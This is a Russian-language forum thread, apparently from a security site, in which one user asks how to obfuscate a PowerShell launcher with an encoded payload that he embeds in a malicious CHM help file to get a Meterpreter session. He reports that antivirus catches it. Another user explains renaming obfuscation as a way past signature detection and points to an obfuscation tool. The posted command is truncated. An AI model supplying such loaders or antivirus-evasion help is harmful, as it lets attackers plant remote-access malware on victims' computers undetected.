• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Проблема Обфускация powershell-кода для последующего внедрения в CHM-файл

A

AlCat

Happy New Year
30.10.2018
13
0
Сгенерирован код.
Код:
powershell -w 1 -C sv YnA -;sv n ec;sv GHP ((gv YnA).value.toString()+(gv n).value.toString());powershell (gv GHP).value.toString() 'JAB3AFYAUwBBACAAPQAgACcAJA....,бла-бла-еще_много_букавок_H0A'
Позже код используется для внедрения в CHM-файл как описано тут Вредоносные CHM
Всё работает, сессия метерпертера прилетает, но палится сие антивирусами. То есть нужно провести обфускацию.

Я не понимаю какую часть кода можно подвергнуть обфускации, и как будет выглядеть соединение обфусцированного и необфуцированного кодов.
....если это вообще возможно...
 
f22

f22

Red Team
05.05.2019
545
43
Я не понимаю какую часть кода можно подвергнуть обфускации, и как будет выглядеть соединение обфусцированного и необфуцированного кодов.
....если это вообще возможно...
Номинально любую часть кода можно обфусцировать.
Что значит соединение?
Предположим, у тебя в коде есть вызов какой-то функции
start_this_super_puper_main_start()

Простейшая обфускация банально заменит имя этой функции на
какую-то абракадабру, вида safdhKJGdskfj()
по такому же принципу будет изменены все названия переменных,
строк и прочая текстовая информация.

Ну а компилятору или интерпретатору, совершенно без разницы, как та или иная
функция называется, он-то всё это переведёт в байт код или машинный код,
который будет выполняться уже уровнем ниже.

А вот в базе данных сигнатур антивируса, записи о подобном коде уже не будет,
что и позволит антивирусу пропустить этот файл.

 
A

AlCat

Happy New Year
30.10.2018
13
0
Номинально любую часть кода можно обфусцировать.
Что значит соединение?
Предположим, у тебя в коде есть вызов какой-то функции
start_this_super_puper_main_start()

Простейшая обфускация банально заменит имя этой функции на
какую-то абракадабру, вида safdhKJGdskfj()
по такому же принципу будет изменены все названия переменных,
строк и прочая текстовая информация.

Ну а компилятору или интерпретатору, совершенно без разницы, как та или иная
функция называется, он-то всё это переведёт в байт код или машинный код,
который будет выполняться уже уровнем ниже.

А вот в базе данных сигнатур антивируса, записи о подобном коде уже не будет,
что и позволит антивирусу пропустить этот файл.

Спасибо что обратили внимание на мой вопрос.
Касаемо статьи на "хакере" - .

...все таки с проблемой нужно переспать. )
С утра соображается лучше.
 
Последнее редактирование:
f22

f22

Red Team
05.05.2019
545
43
Но что то я не понимаю, как это можно применить в моем случае
Если тебе нужно обфусцировать свой код, то используй инструмент.
вот .
Его и .
 
Мы в соцсетях: